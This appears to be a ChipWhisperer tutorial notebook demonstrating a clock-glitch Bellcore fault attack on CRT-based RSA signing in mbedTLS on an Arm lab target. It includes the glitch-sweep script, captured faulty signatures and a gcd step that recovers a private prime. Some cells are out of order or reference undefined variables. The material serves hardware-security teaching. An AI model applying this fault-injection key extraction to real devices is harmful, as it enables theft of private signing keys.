# RSA FaultAttack

This advanced tutorial will demonstrate an attack on RSA signatures that use the Chinese Remainder Theorem as an optimization. This tutorial will make use of glitching, so it's recommended that you complete at least Fault_1-Introduction_to_Clock_Glitch_Attacks before attempting this tutorial. 

Additionally, this tutorial has been designed for Arm targets only. Users of other hardware may need to make changes to available RSA libraries to complete this tutorial.

## Attack Theory

We won't cover much about what RSA (there's a [Wikipedia article](https://en.wikipedia.org/wiki/RSA_(cryptosystem)) for that), but we will give a quick summary.

* RSA is a public key crypto system. It can be used in a few different ways, but we'll be using it for signing messages in this case. In this mode, User A can sign a message using their private information. User B can then verify that User A was the one who signed the message using publically available information.
* This means that some information (n, e) is public, while other information (d, p, q) is private.

The math of RSA (once you have all the key parts generated) is actually pretty simple. To sign the message, the following equation can be applied (with signature s, message m, private exponent d, and public modulus n):

$$s = m^d({mod}\ n)$$

To verify a signature, the following equation is used (with signature s, public exponent e, message m, and public modulus n):

$$s^e = m(mod\ n)$$

Despite the simplicity of these equations, signing messages in particular is a very slow operation, with the implementation from MBEDTLS, a popular crypto library for Arm devices, taking over 12M cycles for RSA-1024 (and this is with the optimization we make in the next section). This is because all of the numbers used in these equations are huge (n and d are 1024 bits long in this case). As you can imagine, improvement we can make to the speed of this operation is very important. It turns out there is a large speed optimization that we can make.

Other important values for RSA include p and q, which are used as a part of the key generation process and are prime factors of n. RSA's security is reliant on the inability to factor n into p and q.

### Chinese Remainder Theorem (CRT)

Instead of computing $s = m^d(mod\ n)$, we can instead break n into two primes, p and q, such that $n = pq$. As you might have guessed, p and q are the same private information we talked about earlier. Bascially, if we learn either, we'll be able to derive the rest of the private information fairly easily. We won't go into all the math, but here's the important operations:

* Derive $d_p$ from d and p and $d_q$ from d and q
* Calculate: $s_1 = m^{d_P}(mod\ p)$ and $s_2 = m^{d_Q}(mod\ q)$
* Combine $s_1$ and $s_2$ into $s$ via CRT

Since p and q are much smaller than n, creating signatures is much much faster this way. As such, many popular RSA implementations (including MBEDTLS) use CRT to speed up RSA.

### Bellcore Attack

Suppose that instead of everything going smoothly as above, that a fault happens during the calculation of $s_1$ or $s_2$ (we'll assume that the fault was with $s_2$ here, which will become $s^{'}_{2}$). If that happens, the following becomes true (with faulty signatures $s_2'$, which generates $s'$):

$$s'^e = m(mod\ p) \Rightarrow s'^e - m = 0 (mod\ p)$$
$$s'^e \neq m(mod\ q) \Rightarrow s'^e - m \neq 0 (mod\ q)$$

The result of this is that p will be a factor of $s'^e - m$, but q and n will not be. Since p is also a factor of N, what follows is that:

$$p = gcd(s'^e - m, N)$$

Thus, if we introduce a fault in the calculation of either $s_1$ or $s_2$, we'll be able to get p, and from there all of the private values!

## Firmware

Next, let's take a look at the RSA implementation we're attacking. For this attack, we'll be using the `simpleserial-rsa-arm` project folder. There's a few files here, but the important one is `simpleserial-arm-rsa.c`. Open it. As you scroll through, you'll find all our public/private values. Next, navigate to `real_dec()`:

```C
uint8_t buf[128];
uint8_t hash[32];
uint8_t real_dec(uint8_t *pt)
{
     int ret = 0;

     //first need to hash our message
     memset(buf, 0, 128);
     mbedtls_sha256(MESSAGE, 12, hash, 0);

     trigger_high();
     ret = simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign(&rsa_ctx, NULL, NULL, MBEDTLS_RSA_PRIVATE, MBEDTLS_MD_SHA256, 32, hash, buf);
     trigger_low();

     //send back first 48 bytes
     simpleserial_put('r', 48, buf);
     return ret;
}
```

You'll notice that we first hash our message (`"Hello World!"`) using SHA256. This isn't too important now, but it will be important later. Next we sign our message using `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()`, then send back the first 48 bytes of it. We'll be sending the signature back in multiple chunks to avoid overflowing the CWLite's buffer of 128 bytes via `sig_chunk_1()` and `sig_chunk_2()` directly below this function.

We'll actually skip over `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()` here, since most of the important stuff actually happens in a different function. You should note, however, that this function has been modified to remove a signature check, which would need to be bypassed in a real attack.

Next, find the function `simpleserial_mbedtls_rsa_private()`, a cleaned up version of `mbedtls_rsa_private()`, where the signature calculation actually happens:
```C
/*
 * Do an RSA private key operation
 */
static int simpleserial_mbedtls_rsa_private( mbedtls_rsa_context *ctx,
                 int (*f_rng)(void *, unsigned char *, size_t),
                 void *p_rng,
                 const unsigned char *input,
                 unsigned char *output )

```

scrolling down a bit, we do indeed find that this function does indeed use CRT to speed up the calculation:

```C
    /*
     * Faster decryption using the CRT
     *
     * T1 = input ^ dP mod P
     * T2 = input ^ dQ mod Q
     */
    MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T1, &T, DP, &ctx->P, &ctx->RP ) );
    MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T2, &T, DQ, &ctx->Q, &ctx->RQ ) );
```

We'll revisit this firmware in the future, but for now, let's build our firmware and then move over to our python script:

In [26]:
PLATFORM = "CWLITEARM"
CRYPTO_TARGET="MBEDTLS"
CRYPTO_OPTIONS="RSA"

In [35]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET" "$CRYPTO_OPTIONS"
cd ../../hardware/victims/firmware/simpleserial-rsa
make PLATFORM=$1 CRYPTO_TARGET=$2 CRYPTO_OPTIONS=$3

rm -f -- simpleserial-rsa-CWLITEARM.hex
rm -f -- simpleserial-rsa-CWLITEARM.eep
rm -f -- simpleserial-rsa-CWLITEARM.cof
rm -f -- simpleserial-rsa-CWLITEARM.elf
rm -f -- simpleserial-rsa-CWLITEARM.map
rm -f -- simpleserial-rsa-CWLITEARM.sym
rm -f -- simpleserial-rsa-CWLITEARM.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- simpleserial-rsa.s simpleserial-rsa-xmega.s simpleserial-rsa-arm.s simpleserial.s stm32f3_hal.s stm32f3_hal_lowlevel.s stm32f3_sysmem.s rsa.s bignum.s md.s md5.s md_wrap.s sha1.s sha256.s sha512.s ripemd160.s oid.s
rm -f -- simpleserial-rsa.d simpleserial-rsa-xmega.d simpleserial-rsa-arm.d simpleserial.d stm32f3_hal.d stm32f3_hal_lowlevel.d stm32f3_sysmem.d rsa.d bignum.d md.d md5.d md_wrap.d sha1.d sha256.d sha512.d ripemd160.d oid.d
rm -f -- simpleserial-rsa.i simpleserial-rsa-xmega.i simpleserial-rsa-arm.i simpleserial.i stm32f3_hal.i stm32f3_hal_lowlevel.i stm32f3_sysmem.i rsa.i bignum.i md.i md5.i md_wrap.i sha1.i sha256.i sha512.i ripemd160.i o

simpleserial-rsa-arm.c: In function 'simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign':
     volatile unsigned char diff_no_optimize;
                            ^~~~~~~~~~~~~~~~
     unsigned char diff;
                   ^~~~
     size_t i;
            ^
simpleserial-rsa-arm.c: In function 'real_dec':
      mbedtls_sha256(MESSAGE, 12, hash, 0);
                     ^~~~~~~
In file included from simpleserial-rsa-arm.c:28:0:
.././crypto/mbedtls//include/mbedtls/sha256.h:127:6: note: expected 'const unsigned char *' but argument is of type 'const char *'
 void mbedtls_sha256( const unsigned char *input, size_t ilen,
      ^~~~~~~~~~~~~~
.././crypto/mbedtls//library/rsa.c: In function 'mbedtls_rsa_rsassa_pkcs1_v15_sign':
     volatile unsigned char diff_no_optimize;
                            ^~~~~~~~~~~~~~~~
     unsigned char diff;
                   ^~~~
     size_t i;
            ^


## Attack Script

Start by initializing the ChipWhisperer:

In [1]:
import chipwhisperer as cw
import binascii
scope = cw.scope()
target = cw.target(scope)
scope.adc.basic_mode = "rising_edge"
scope.clock.clkgen_freq = 7370000
scope.clock.adc_src = "clkgen_x1"
scope.trigger.triggers = "tio4"
scope.io.tio1 = "serial_rx"
scope.io.tio2 = "serial_tx"
scope.io.hs2 = "clkgen"

Next, program it with our new firmware:

In [2]:
prog = cw.programmers.STM32FProgrammer
fw_path = "../../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-CWLITEARM.hex"
cw.programTarget(scope, prog, fw_path)

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to programming 43087 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 43087 bytes


### Verifying Signatures

Let's start by seeing if we can verify the signature that we get back. First, we run the signature calculation:

In [4]:
import time
target.go_cmd = 't\\n'
scope.arm()
target.go()

while target.isDone() is False:
    timeout -= 1
    time.sleep(0.01)

try:
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')
except IOError as e:
    print('IOError: %s' % str(e))
    
time.sleep(2)
num_char = target.ser.inWaiting()
output = target.ser.read(num_char, timeout=10)

In [5]:
print(scope.adc.trig_count)

12725653


As you can see, the signature takes a long time! For the STM32F3, it should be around 12.7M cycles. Next, let's get the rest of the signature back and see what it looks like.

In [6]:
target.go_cmd = '1\\n'
target.go()
time.sleep(0.2)
num_char = target.ser.inWaiting()
output += target.ser.read(num_char, timeout=10)

target.go_cmd = '2\\n'
target.go()
time.sleep(0.2)
num_char = target.ser.inWaiting()
output += target.ser.read(num_char, timeout=10)

In [7]:
print(output)

r4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD
z00
r85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D
z00
r7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80
z00



You should see something like:
```
r4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD
z00
r85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D
z00
r7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80
z00
```

We'll need to strip all the extra simpleserial stuff out. This can be done like so:

In [8]:
newout = output.replace("r", "").replace("\nz00","").replace("\n","")
print(newout)

4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80


Then we can convert this to binary using binascii:

In [10]:
import binascii
sig = binascii.unhexlify(newout)

Finally, we can verify that the signature is correct using the PyCryptodome package:

In [11]:
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 

from Crypto.Hash import SHA256

E = 0x10001
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
m = b"Hello World!"

hash_object = SHA256.new(data=m)
pub_key = RSA.construct((N, E))
signer = PKCS1_v1_5.new(pub_key) 
print(signer.verify(hash_object, sig))

True


If everything worked out correctly, you should see `True` printed above. Now onto the actual attack.

### Getting a Glitch

In [3]:
import time
from tqdm import tnrange
def reset_target(scope):
    scope.io.nrst = 'low'
    #scope.io.pdic = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high'
    #scope.io.pdic = 'high'
    
for i in tnrange(7000000, 7100000):
    scope.glitch.ext_offset = i
    target.go_cmd = 't\\n'
    scope.adc.timeout = 3
    scope.arm()
    target.go()



    while target.isDone() is False:
        timeout -= 1
        time.sleep(0.01)

    try:
        ret = scope.capture()
        if ret:
            print('Timeout happened during acquisition')
    except IOError as e:
        print('IOError: %s' % str(e))
    time.sleep(2)
    num_char = target.ser.inWaiting()
    output = target.ser.read(num_char, timeout=10)
    #print(output)
    if "4F09799" not in output and 1:
        if len(output) > 0:
            print(f"Possible glitch at offset {scope.glitch.ext_offset}\nOutput: {output}")
            #chunk 1
            target.go_cmd = '1\\n'
            target.go()
            time.sleep(0.2)
            num_char = target.ser.inWaiting()
            output += target.ser.read(num_char, timeout=10)

            target.go_cmd = '2\\n'
            target.go()
            time.sleep(0.2)
            num_char = target.ser.inWaiting()
            output += target.ser.read(num_char, timeout=10)
            newout = output.replace("r", "").replace("\nz00","").replace("\n","")
            print(f"Full output: {newout}")
            if (len(newout) == 256) and "r0001F" not in output:
                print("Very likely glitch!")
                break
            #if not (len(output) % 2):
                #break
        else:
            print(f"Probably crash at {scope.glitch.ext_offset}")
            reset_target(scope)
            time.sleep(0.5)

HBox(children=(IntProgress(value=0, max=100000), HTML(value='')))

Probably crash at 7000004
Probably crash at 7000005
Probably crash at 7000006
Probably crash at 7000011
Possible glitch at offset 7000013
Output: r243682155FEDD39F51F9A8CA3FFE923E5579F29A6FA6C2C599E6F29A7F6C8124D21F335A91FAAF8AF67C6D6BAEA89A0B
z00

Full output: 243682155FEDD39F51F9A8CA3FFE923E5579F29A6FA6C2C599E6F29A7F6C8124D21F335A91FAAF8AF67C6D6BAEA89A0BC1120EA646848B997EE0D52B2014CA1363EA75F4D19B27BDB85C8ABD9C78A08B9A206236BEF60D2DE5D6410574D2801470416DA2E72800E4A919756B97CA3B5AF21B6780667B24ED016E8989424D0BD0
Very likely glitch!


In [24]:
import binascii
newout = output.replace("r", "").replace("\nz00","").replace("\n","")
print(newout)
print(len(newout))

0001FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFzF0FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF003031300D0609608648016503040201050004207F83B1657FF1FC53B92DC18148A1D65DFC2D4B1FA3D677284ADDD200126D9069
259


In [59]:
glitched_sigs.append(newout)

In [6]:
print(len(newout + "0"))

257


In [6]:
binout = binascii.unhexlify(newout)
print(binout)
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79

b"$6\x82\x15_\xed\xd3\x9fQ\xf9\xa8\xca?\xfe\x92>Uy\xf2\x9ao\xa6\xc2\xc5\x99\xe6\xf2\x9a\x7fl\x81$\xd2\x1f3Z\x91\xfa\xaf\x8a\xf6|mk\xae\xa8\x9a\x0b\xc1\x12\x0e\xa6F\x84\x8b\x99~\xe0\xd5+ \x14\xca\x13c\xeau\xf4\xd1\x9b'\xbd\xb8\\\x8a\xbd\x9cx\xa0\x8b\x9a b6\xbe\xf6\r-\xe5\xd6A\x05t\xd2\x80\x14pAm\xa2\xe7(\x00\xe4\xa9\x19uk\x97\xca;Z\xf2\x1bg\x80f{$\xed\x01n\x89\x89BM\x0b\xd0"


In [2]:
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 1
scope.glitch.width = -9
scope.glitch.offset = -38.3
scope.glitch.ext_offset = 5770000
scope.io.hs2 = "glitch"
print(scope.glitch)
from collections import namedtuple
Range = namedtuple('Range', ['min', 'max', 'step'])

clk_src     = clkgen
width       = -8.984375
width_fine  = 0
offset      = -38.28125
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 5770000
repeat      = 1
output      = clock_xor



In [22]:
from math import gcd
def build_message(m, N):
    sha_id = "3031300d060960864801650304020105000420"
    N_len = (len(bin(N)) - 2 + 7) // 8
    pad_len = (len(hex(N)) - 2) // 2 - 3 - len(m)//2 - len(sha_id)//2
    padded_m = "0001" + "ff" * pad_len + "00" + sha_id + m
    return padded_m
m = "7F83B1657FF1FC53B92DC18148A1D65DFC2D4B1FA3D677284ADDD200126D9069"
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
padded_m = build_message(m, N)
a = int.from_bytes(binout, "big")**65537 - int.from_bytes(binascii.unhexlify(padded_m), "big")


In [19]:
print((len(hex(N)) - 2)//2)

128


In [23]:
p_test = gcd(a, N)

In [25]:
print(hex(p_test))

0xc36d0eb7fcd285223cfb5aaba5bda3d82c01cad19ea484a87ea4377637e75500fcb2005c5c7dd6ec4ac023cda285d796c3d9e75e1efc42488bb4f1d13ac30a57


In [None]:
print(str(a))

In [11]:
E = 0x10001
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79

D = 0x24BF6185468786FDD303083D25E64EFC66CA472BC44D253102F8B4A9D3BFA75091386C0077937FE33FA3252D28855837AE1B484A8A9A45F7EE8C0C634F99E8CDDF79C5CE07EE72C7F123142198164234CABB724CF78B8173B9F880FC86322407AF1FEDFDDE2BEB674CA15F3E81A1521E071513A1E85B5DFA031F21ECAE91A34D
P = 0xC36D0EB7FCD285223CFB5AABA5BDA3D82C01CAD19EA484A87EA4377637E75500FCB2005C5C7DD6EC4AC023CDA285D796C3D9E75E1EFC42488BB4F1D13AC30A57
Q = 0xC000DF51A7C77AE8D7C7370C1FF55B69E211C2B9E5DB1ED0BF61D0D9899620F4910E4168387E3C30AA1E00C339A795088452DD96A9A5EA5D9DCA68DA636032AF

from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 
import binascii
from Crypto.Hash import SHA256

hash_object = SHA256.new(data=b"Hello World!")
pub_key = RSA.construct((N, 65537, D, P, Q))
signer = PKCS1_v1_5.new(pub_key) 

print(binascii.hexlify(hash_object.digest()))
    
print(binascii.hexlify(signer.sign(hash_object)))

print(len(hash_object.digest()))
print(len(signer.sign(hash_object)))
print(len(hex(N)))

b'7f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069'
b'4f09799f6a59081b725599753330b7a2440abc42606601622fe0c582646e32555303e1062a2989d9b4c265431adb58dd85bb33c4bb237a311bc40c1279528fd6bb36f94f534a4d8284a18ab8e5670e734c55a6ccab5fb5eae02ba37e2d56648d7a13bbf17a0e07d607c07cbb72c7a7a77076376e8434ce6e136832dc95db3d80'
32
128
258
